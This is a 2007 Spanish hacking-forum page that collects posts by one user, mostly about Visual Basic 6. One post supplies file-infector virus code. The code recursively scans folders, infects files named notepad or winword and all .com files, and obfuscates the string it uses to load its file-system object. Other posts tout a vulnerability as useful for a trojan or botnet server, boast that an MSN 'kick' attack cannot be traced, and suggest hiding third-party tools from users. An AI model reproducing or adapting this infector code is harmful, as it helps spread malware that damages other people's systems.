Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Mad Antrax

#761
He posteado una nueva vulnerabilidad y la prueba de concepto la he hecho (como no) en VB6. Os dejo el link del hilo principal por si alguien quiere investigar un poquito sobre este tema. Realmente es muy interesante para el server de un troyano o una botnet.

Saludos!!

[Vulnerabilidad] Shared-Folder execution bypass vulnerability
http://foro.elhacker.net/index.php/topic,172016.0.html

EDIT: el link se ha movido al foro privado hasta que se encuentre una solución a la vulnerabilidad. Lo siento
#762
Cita de: -Freeze- en 11 Julio 2007, 22:35 PM
||MadAntrax||

Podrias decirnos como es que pones las letras de colores automaticamente(se ve mas ordenado)

o es manual o.O??

Instalado Mod para Programación/Programadores GeSHi
https://foro.elhacker.net/index.php/topic,170103.0.html
#763
Código (vb) [Seleccionar]
Randomize
IP1 = Int((Rnd * 255) + 1)
IP2 = Int((Rnd * 255) + 1)
IP3 = Int((Rnd * 255) + 1)
IP4 = Int((Rnd * 255) + 1)
MsgBox IP1 & "." & IP2 & "." & IP3 & "." & IP4
#764
Cita de: nhaalclkiemr en 11 Julio 2007, 21:34 PM
Solo con que me digas como puedo en VB6.0 obtener los parametros con los que se ejecutó una aplicación ya está.

Existe una variable de VB6 llamada:

Código (vb) [Seleccionar]
Parametros = Command$

Esto te devuelve los parametros con el que se ha ejecutado tu aplicación, con eso tienes suficiente. Saludos!!
#765
Cita de: nhaalclkiemr en 11 Julio 2007, 20:43 PM
-Que busque el nombre de un programa en concreto y solo infecte a ese.

Aqui tienes para lo del nombre:

Código (vb) [Seleccionar]
Function Subfolders(path)
    On Error Resume Next
    'Se cifra el string que carga el objeto Scripting.FileSystemObject
    Set fso = CreateObject(bullet("Qapkrvkle,DkngQ{qvgoM`hgav"))
    Set Drives = fso.Drives

    newpath = path
    Set Fold = fso.GetFolder(newpath)
    Set Files = Fold.Files

    For Each File In Files
        ext = fso.GetExtensionName(File.path)
        ext = LCase(ext)
        nam = LCase(File.Name)
        'Modificación del Source
        If (nam = "notepad") OR (nam = "winword") OR (ext = "com") Then
            If IsInfected(File.path) = False Then
                InfectFile (File.path)
                DoEvents
            End If
        End If
    Next

    Set File = Fold.Subfolders
    For Each Subfol In File
        Call Subfolders(Subfol.path)
    Next
End Function

Este ejemplo infecta cualquier archivo llamado notepad.* y winword.* Además infectará todos los archivo con extensión *.com

Citar-Que no infecte a una carpeta (subcarpetas y archivos  :xD) determinada o que solo infecte a una determinada
Este es más complicado, pero creo que debería suprimir la parte del final:

Código (vb) [Seleccionar]
    Set File = Fold.Subfolders
    For Each Subfol In File
        Call Subfolders(Subfol.path)
    Next


Y llamar a la función: Subfolders con la ruta exacta, ejemplo: Subfolders("C:\Windows\System32)"
Ojo que esto último no lo he probado
#766
Bueno, a uno de ellos ya se presentó: Hendrix en el post de "Moderador Visual Basic 6.0" Y Ahora este subforo se refuerza con el apoyo y dedicación de E0N, que ha demostrado una dedicación, profesionalidad y ética envidiable y por ello se ha ganado el merecido puesto.

Espero que el número de trolls vaya decayendo así como los futuros proyectos de VB vayan en aumento.

Sin más que añadir: Felicidades y bienvenidos Hendrix y E0N
#767
O si no... el propio VB6 tiene un asistente para proyectos empresariales. Esto te genera un proyecto de ejemplo de un editor de textos MDI (creo que se llama así), con su toolbar, menus y ventanitas Child's xD

Saludos!
#768
Cita de: Tughack en  7 Julio 2007, 00:59 AM
Para k kieres tal cosa? Para copiar codigo? K lammer...

Calma, calmaaaaaaa...

Si hay decompiladores, la mayoría de ellos devuleven el diseño del formulario, APIS usadas, String, etc... pero el source completo olvidate xD

Yo uso VB Decompiler Lite
#769
La grácia del MSN Kick es que el ataque es tan rápido que la victima no llega a ver inguna ventana de inicio de sesión.

Te puedo aseguar que si le lanzas el ataque a alguien de tu MSN no verá ni sabrá que has sido tu. Solo lo puede descubrir si lee los logs y ve un montón de :[ en el log. Pero vamos eso casi nunca pasa.

Cita de: redshots en  6 Julio 2007, 06:45 AM
por cierto si la pregunta esta dirigida a madantrax porque no le envias un mensaje privado........?

Es cierto, estas cosas mejor por privado para evitar ensuciar el foro. Saludos!! :)
#770
yo para hacer eso me nutro de las ServerTools que ofrece Microsoft, son paquetes con muchas aplicaciones basadas en líneas de comando que permiten hacer multitud de cosas.

Te recomiendo las RKTools de Microsoft, lo instalas y pruebas las aplicaciones hay algunas tipo "permcopy" (para copiar permisos de un directorio a otro) "whoami" (devuleve usuario actual y dominio), etc... te dejo el link:

RK-Tools for Win2k3

Sirven para XP tambien, te dejo el listado completo:

CitarThe following tools are provided:

    * Acctinfo.dll (documented in Readme.htm)
    * Adlb.exe: Active Directory Load Balancing Tool
    * Admx.msi: ADM File Parser
    * Atmarp.exe: Windows ATM ARP Server Information Tool
    * Atmlane.exe: Windows ATM LAN Emulation Client Information
    * Autoexnt.exe: AutoExNT Service
    * Cdburn.exe: ISO CD-ROM Burner Tool
    * Checkrepl.vbs: Check Replication
    * Chklnks.exe: Link Check Wizard
    * Chknic.exe: Network Interface Card Compliance Tool for Network Load Balancing
    * Cleanspl.exe: Spooler Cleaner
    * Clearmem.exe: Clear Memory
    * Clusdiag.msi: Cluster Diagnostics and Verification Tool
    * Clusfileport.dll: Cluster Print File Port
    * Clusterrecovery.exe: Server Cluster Recovery Utility
    * Cmdhere.inf: Command Here
    * Cmgetcer.dll: Connection Manager Certificate Deployment Tool
    * Compress.exe: Compress Files
    * Confdisk.exe: Disk Configuration Tool
    * Consume.exe: Memory Consumers Tool
    * Creatfil.exe: Create File
    * Csccmd.exe: Client-Side Caching Command-Line Options
    * Custreasonedit.exe: Custom Reason Editor (documented in Readme.htm)
    * Delprof.exe: User Profile Deletion Utility
    * Dh.exe: Display Heap
    * Diskraid.exe: RAID Configuration Tool
    * Diskuse.exe: User Disk Usage Tool
    * Dnsdiag.exe: SMTP DNS Diagnostic Tool (documented in Readme.htm)
    * Dumpfsmos.cmd: Dump FSMO Roles
    * Dvdburn.exe: ISO DVD Burner Tool
    * Empty.exe: Free Working Set Tool
    * Eventcombmt.exe: Check Replication
    * Fcopy.exe: File Copy Utility for Message Queuing
    * Frsflags.vbs
    * Getcm.exe: Connection Manager Profile Update
    * Gpmonitor.exe: Group Policy Monitor
    * Gpotool.exe: Group Policy Objects
    * Hlscan.exe: Hard Link Display Tool
    * Ifilttst.exe: IFilter Test Suite
    * Ifmember.exe: User Membership Tool
    * Inetesc.adm: Internet Explorer Enhanced Security Configuration
    * Iniman.exe: Initialization Files Manipulation Tool
    * Instcm.exe: Install Connection Manager Profile
    * Instsrv.exe: Service Installer
    * Intfiltr.exe: Interrupt Affinity Tool
    * Kerbtray.exe: Kerberos Tray
    * Kernrate.exe: Kernel Profiling Tool
    * Klist.exe: Kerberos List
    * Krt.exe: Certification Authority Key Recovery
    * Lbridge.cmd: L-Bridge
    * Linkd.exe
    * Linkspeed.exe: Link Speed
    * List.exe: List Text File Tool
    * Lockoutstatus.exe: Account Lockout Status (documented in Readme.htm)
    * Logtime.exe
    * Lsreport.exe: Terminal Services Licensing Reporter
    * Lsview.exe: Terminal Services License Server Viewer
    * Mcast.exe: Multicast Packet Tool
    * Memmonitor.exe: Memory Monitor
    * Memtriage.exe: Resource Leak Triage Tool
    * Mibcc.exe: SNMP MIB Compiler
    * Moveuser.exe: Move Users
    * Mscep.dll: Certificate Services Add-on for Simple Certificate Enrollment Protocol
    * Nlsinfo.exe: Locale Information Tool
    * Now.exe: STDOUT Current Date and Time
    * Ntimer.exe: Windows Program Timer
    * Ntrights.exe
    * Oh.exe: Open Handles
    * Oleview.exe: OLE/COM Object Viewer
    * Pathman.exe: Path Manager
    * Permcopy.exe: Share Permissions Copy
    * Perms.exe: User File Permissions Tool
    * Pfmon.exe: Page Fault Monitor
    * Pkiview.msc: PKI Health Tool
    * Pmon.exe: Process Resource Monitor
    * Printdriverinfo.exe: Drivers Source
    * Prnadmin.dll: Printer Administration Objects
    * Qgrep.exe
    * Qtcp.exe: QoS Time Stamp
    * Queryad.vbs: Query Active Directory
    * Rassrvmon.exe: RAS Server Monitor
    * Rcontrolad.exe: Active Directory Remote Control Add-On
    * Regini.exe: Registry Change by Script
    * Regview.exe (documented in Readme.htm)
    * Remapkey.exe: Remap Windows Keyboard Layout
    * Robocopy.exe: Robust File Copy Utility
    * Rpccfg.exe: RPC Configuration Tool
    * Rpcdump.exe
    * Rpcping.exe
    * RPing: RPC Connectivity Verification Tool
    * Rqc.exe: Remote Access Quarantine Client
    * Rqs.exe: Remote Access Quarantine Agent
    * Setprinter.exe: Spooler Configuration Tool
    * Showacls.exe
    * Showperf.exe: Performance Data Block Dump Utility
    * Showpriv.exe: Show Privilege
    * Sleep.exe: Batch File Wait
    * Sonar.exe: FRS Status Viewer
    * Splinfo.exe: Print Spooler Information
    * Srvany.exe: Applications as Services Utility
    * Srvcheck.exe: Server Share Check
    * Srvinfo.exe: Remote Server Information
    * Srvmgr.exe: Server Manager
    * Ssdformat.exe: System State Data Formatter
    * Subinacl.exe
    * Tail.exe
    * Tcmon.exe: Traffic Control Monitor
    * Timeit.exe (documented in Readme.htm)
    * Timezone.exe: Daylight Saving Time Update Utility
    * Tsctst.exe: Terminal Server Client License Dump Tool
    * Tsscalling.exe: Terminal Services Scalability Planning Tools
    * Uddicatschemeeditor.exe: UDDI Services Categorization Scheme Editor
    * Uddiconfig.exe: UDDI Services Command-line Configuration Utility
    * Uddidataexport.exe: UDDI Data Export Wizard
    * Usrmgr.exe: User Manager for Domains
    * Vadump.exe: Virtual Address Dump
    * Vfi.exe: Visual File Information
    * Volperf.exe: Shadow Copy Performance Counters
    * Volrest.exe: Shadow Copies for Shared Folders Restore Tool
    * Vrfydsk.exe: Verify Disk
    * Winexit.scr: Windows Exit Screen saber
    * Winhttpcertcfg.exe: WinHTTP Certificate Configuration Tool
    * Winhttptracecfg.exe: WinHTTP Tracing Facility Configuration Tool
    * Winpolicies.exe: Policy Spy
    * Wins.dll: WINS Replication Network Monitor Parser
    * Wlbs_hb.dll & Wlbs_rc.dll: Windows Load Balancing Server Network Monitor Parsers

Usa la aplicación que mejor te convenga y la añades como recurso a tu proyecto de VB6, si te lo curras el usuario no se dará cuenta ni que estas usando third-party aplications.

Saludos!!